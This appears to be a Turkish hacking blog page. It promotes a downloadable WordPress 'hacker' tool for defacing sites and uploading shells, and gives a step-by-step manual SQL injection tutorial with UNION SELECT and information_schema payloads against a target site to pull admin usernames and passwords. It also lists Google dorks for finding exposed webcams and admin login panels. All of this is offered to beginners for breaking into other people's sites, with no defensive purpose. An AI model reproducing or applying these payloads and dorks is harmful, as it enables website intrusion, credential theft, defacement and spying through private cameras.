CuLLeN_s Wp Hacker V3.2


NEDİR Şifresi bilinen siteye kolayca index atmaya ve shell atmaya yarar kesin hack imkanı verir 
ek olarak zone alır.


Bazı siteler için bypass özelliği vardır shell yüklerken.


Tanıtım/Kullanım/Tutorial


https://www.youtube.com/watch?v=y0NLZKwl7yk




Arkadaşlar uzun süredir beklediğiniz programı bugün buradan paylaşıyorum.
eski sürümdeki bazı hataları giderdim,config özelliği hata veriyor inş. ileride düzelteceğim bununla beraber 2 siteden zone alıyor.

bir teşekkürünüze passwordu veriyorum şifreyi iletişim adresinden isteyin.

lyokocode44@gmail.com


link : İNDİR

virüs-total  :   https://www.virustotal.com/tr/file/45406a56b42d707677adb563009cf7f8c88408aac07c83fdc319722c8f4f286b/analysis/


spacer

CuLLen_s Wp Hacker V3


Dikkat... Arkadaşlar ben bu programıma kullanım süresi koymuştum ileride pişman olursam program kendini kapatsın diye süresi doldu yeni sürüm v4 geliyor yakında...















CuLLeN_s Wp Hacker V3

Arkadaşlar programım binlerce insan tarafından kullanılmaya başlanınca bende blogumda paylaşma gereği duydum. Bu programı tht yıllarımda kodlamıştım , Rar pass için iletişim kısımından yazın hiçbir forumda artık aktif değilim bilginize.

CuLLeN_s Wp Hacker V3 indir

Not: bu program hacka yeni başlayanlar için kodlanmıştır WordPress sitelere index atmaya shell basmaya ve zone almaya yarar.  Web güvenlik zafiyeti kullanıp şifre kırmaz.

Rar pw için iletişim bölümünü kullanın arkadaşlar.


Yeni SÜRÜM Çıktı :  :  : Tıkla



spacer

5-)Manuel Sql İnjection

Manuel Sql İnjection,sql injection,gelişmiş sql injection,manuel sql enjeksiyon,elle sql hack,hack,sql.



Arkadaşlar bu konuyu çok özenle hazırladım her kodu sizin için açıkladım bu yüzden full yazı yazdım işin mantığı için okuyun. Ve takıldığınız yeri yorumda sorun lütfen.

Arkadaşlar sql injection hack yapacaksanız eğer size sadece manuel sql öneririm çünkü programı yazan kişide bir insandır ve o programlarda bizim burada çalıştıracağımız kodları çalıştırıyor.

Ama o programları yazan kişiler sql hakkında baya bilgili kişiler olduğu için manuel sql size onların programından daha etkisiz gelebilir.Ama öyle değildir ileri düzey düşüneceğiz ve "ileri düzey sql injection" ile o programların çekemediği bilgileri çekeceğiz.

öncelikle sitemizde sql injection açığının olduğundan emin olmalıyız.
bkz. Elle(manuel) Sql Açığı Tespit Etme

site: hedefsite.com/index.php?id=1 


order by 1 diyoruz ve "1" i sırayla arttırıyoruz mesela diyelim order by 8 yaptık site normal açıldı ama order by 9 yapınca bozulduysa bu sitede 8 tane kolon vardır.


hedefsite.com/index.php?id=1 order by 1



ardından union select 1,2,3,4,5,6,7,8 --> 8 kolon olduğu için 8'e kadar.
böyle yapınca ekrana bakıyoruz herhangi bir sayı arıyoruz bu sitede 2 sayısı yansıdı o zaman sql komutlarını 2 sayısını silip orada çalıştırabiliriz.


hedefsite.com/index.php?id=1union select 1,2,3,4,5,6,7,8

union select 1,Database(),3,4,5,6,7,8 bu sitemizin database ismi :)

hedefsite.com/index.php?id=1 union select 1,Database(),3,4,5,6,7,8

union select 1,version(),3,4,5,6,7,8 buda sitenin versiyonu eğer 5 ve üstü ise bu kodları çalıştıracağız ama eğer 4 ise hiç ugrasmayın :)




union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables --> "information_schema" her sitede bulunur bizim db ye ulaşmamızı sağlar. bu kod ile tabloları istedik


hedefsite.com/index.php?id=1 union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables



union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns bu kod ile kolonları istedik


hedefsite.com/index.php?id=1 union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns
union select 1,kolon adı,3,4,5,6,7,8 from tablo adı admin bilgilerinin olduğu tablodan kolonları yansıtmasını istedik :) ve admin username ve password :)






























spacer

4-)Online Web Kameralarının Tespiti

Online Web Kameralarının tespiti

Yanlış duymadınız :=) internette dolaşan bir çok kameraya bu exploit sayesiden ulaşabileceksiniz.



[intitle:’my webcamXP Server’]

kriterinin girilmesi yeterli oluyor

bunun nerden çıktığını merak ediyorsanız şuraya bakın

Exploit Nedir ve Google Gelişmiş Arama Tekniği
spacer

3-)Admin Panel Bulma Exploiti



Önce --> Exploit Nedir ve Google Gelişmiş Arama Tekniği


Arkadaşlar bu konuları okuyun yoksa anlamazsınız. Admin panel bulmada baska bilinmeyen bir yöntemi göstereceğim

mesela bi sitenin db bilgilerini çektiniz ama admin panelini bulamadınız o zaman bi de şu yöntemi deneyin


site:hedefsite.com/ inurl:admin


site:hedefsite.com/ inurl:login


burada kırmızı renk olan yere istediğinizi yazın size kalmış tutturursanız ulaşacaksınız panele.
spacer

2-)Google Gelişmiş Arama Tekniği

blog hayatım boyunca tek alıntı konum bu çünkü bende aynı şeyleri yazacaktım sizin için en iyiyi araştırıyorum.

Google’ın marifetlerini daha iyi anlayabileceğiniz arama tekniklerine göz atacağız.


filetype:

Dosya uzantılarına göre arama yapabileceğiniz bu komutla, arama kriterinizi içeren bilgilere ait dökümanlara ulaşabilirsiniz.

Örneğin [filetype: pdf ‘MacOS X’] yazdığınızda, MacOS X kelimesinin geçtiği 11.700 adet .pdf dosyasına ulaşabiliyoruz. Bulduğunuz belgeleri indirmeden önce ‘HTML olarak görüntüle’ linkine tıklayarak, içeriğine gözatabilirsiniz. Filetype operatörünün diğer alternatifi de ext: operatörüdür (extension) ve aynı mantıkla çalışır.


allintitle:

Bu komut, arama kriterinizde yer alan kelimelerin tamamının, internet tarayıcısının başlık çubuğunda yer almasını şart koşar. Örnek verecek olursak, [allintitle:’Flash Movies’] şeklindeki arama kriterinin sonucu olarak, web sayfasının title bilgisi üzerinde Flash Movies kelimeleri geçen sayfalar listelenecektir.


intitle:

‘allintitle’ komutundan farklı olarak, ilk arama kriterini başlık satırında arar, diğer kelimeleri ise metin içerisinde kontrol edilir.


allinurl:

Bu operatör, arama kriterine ait kelimeleri internet adres satırındaki (url) kelimeler içerisinde arar.
inurl:
İlk arama kriterini adres satırında arar.


cache:

Listelenen web sayfalarına ait sunuculara ulaşılamadığı durumlarda, cache operatörünü kullanarak, ilgili sayfaya Google’ın daha önce indekslediği bilgiler üzerinden ulaşabilirsiniz.


site:

Bu operatörü kullanarak, herhangi bir web sitesi içerisinde arama yapabilirsiniz. Örneğin [site:www.macline.com.tr Adobe] kriterini girdiğinizde, Macline web sitesi içerisinde ‘Adobe’ kelimesi geçen sayfalara ulaşabilirsiniz.


Link:

Bu komutu kullanarak herhangi bir web sitesine hangi sayfalardan link verildiğini öğrenebilirsiniz.
Bu operatörler tek başlarına kullanılabildiği gibi, birarada da kullanılabilmektedir. Örnek vermek gerekirse:

[intitle:Fiyat Listesi filetype: pdf]
[intitleVD Video filetype: pdf]
[intitle:mp3 ‘eye of the tiger’]
[site:edu intitle:science]
spacer

1-)Exploit Nedir Ne İşe Yarar




exploit:
Şöyle söyliyeyim bir ev düşünün bu evi sızmak istediğimiz hedef website olarak düşünün bu evin kapısının anahtarı sayesinde eve girebileceğiz. İşte bu anahtar exploit oluyor.:) Yani exploitler sayesiden hedef sistemlere sızabiliriz bu sistem site olur,bilgisayar olur ve saire yine kolaylaştırdım sizin için ;)
spacer